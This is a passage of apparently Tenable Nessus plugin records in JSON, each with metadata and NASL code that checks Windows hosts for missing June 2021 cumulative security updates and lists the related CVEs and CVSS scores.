extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150374);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31951\",\n \"CVE-2021-31952\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31955\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31969\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-31977\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003646\");\n script_xref(name:\"MSFT\", value:\"MS21-5003646\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5003646: Windows 10 version 1809 / Windows Server 2019 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003646. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003646\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003646\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003646'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'17763',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003646])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-10T03:09:06", "description": "The remote Windows host is missing security update 5003637. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003637: Windows 10 version 2004 / Windows 10 version 20H2 / Windows 10 version 21H1 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31960", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003637.NASL", "href": "https://www.tenable.com/plugins/nessus/150370", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150370);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31951\",\n \"CVE-2021-31952\",\n \"CVE-2021-31954\",\n \"CVE-2021-31955\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31960\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31969\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-31977\",\n \"CVE-2021-33739\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003637\");\n script_xref(name:\"MSFT\", value:\"MS21-5003637\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5003637: Windows 10 version 2004 / Windows 10 version 20H2 / Windows 10 version 21H1 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003637. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003637\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003637\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003637'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'19041',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003637])\n\n|| smb_check_rollup(os:'10', \n sp:0,\n os_build:'19042',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003637])\n\n|| smb_check_rollup(os:'10', \n sp:0,\n os_build:'19043',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003637])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-10T03:09:58", "description": "The remote Windows host is missing security update 5003695. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003695: Windows Server 2008 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31962", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-33742"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003695.NASL", "href": "https://www.tenable.com/plugins/nessus/150357", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150357);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31962\",\n \"CVE-2021-31971\",\n \"CVE-2021-31973\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003661\");\n script_xref(name:\"MSKB\", value:\"5003695\");\n script_xref(name:\"MSFT\", value:\"MS21-5003661\");\n script_xref(name:\"MSFT\", value:\"MS21-5003695\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5003695: Windows Server 2008 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003695. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003695\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003661\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003695\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003695',\n '5003661'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003695, 5003661])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-10T03:11:23", "description": "The remote Windows host is missing security update 5003694. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003694: Windows Server 2008 R2 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-33742"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003694.NASL", "href": "https://www.tenable.com/plugins/nessus/150368", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150368);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31971\",\n \"CVE-2021-31973\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003667\");\n script_xref(name:\"MSKB\", value:\"5003694\");\n script_xref(name:\"MSFT\", value:\"MS21-5003667\");\n script_xref(name:\"MSFT\", value:\"MS21-5003694\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5003694: Windows Server 2008 R2 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003694. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003694\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003667\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003694\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003694',\n '5003667'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003694, 5003667])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-10T03:09:58", "description": "The remote Windows host is missing security update 5003697. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003697: Windows Server 2012 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-33742"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003697.NASL", "href": "https://www.tenable.com/plugins/nessus/150363", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150363);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003697\");\n script_xref(name:\"MSFT\", value:\"MS21-5003697\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5003697: Windows Server 2012 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003697. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003697\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003697\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003697'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003697])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-10T03:09:05", "description": "The remote Windows host is missing security update 5003681. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003681: Windows Server 2012 R2 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31970", 